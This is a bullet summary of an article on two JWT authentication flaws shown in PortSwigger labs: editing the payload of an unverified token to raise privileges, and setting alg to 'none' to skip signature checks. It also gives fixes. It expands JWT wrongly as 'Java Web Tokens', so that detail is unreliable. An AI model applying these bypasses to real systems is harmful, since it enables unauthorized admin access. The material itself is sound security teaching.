Summary
- JWT (Java Web Tokens) are used for stateless authentication, and typically comprise three components: the header, payload and signature.
- Various bugs in JWT can be exploited by attackers, including bypassing signature verification and using weak or flawed algorithms.
- Guards should be erected against all potential JWT authentication weaknesses, including unverified signatures and flawed verification practices.
- These flaws can give attackers the chance to elevate privileges or perform undesired actions.
- Two such flaws are tackled in this article, using labs from cybersecurity firm PortSwigger.
- Firstly, an unverified signature can be manipulated by editing the JWT’s payload to elevate privileges.
- Secondly, by setting the algorithm to “none”, the signature can be ignored entirely, giving admin rights and the ability to delete other users.
- These flaws can be fixed by always verifying JWT signatures and rejecting alg: none tokens, instead forcing strong algorithms.
By Aditya Bhatt
Original Article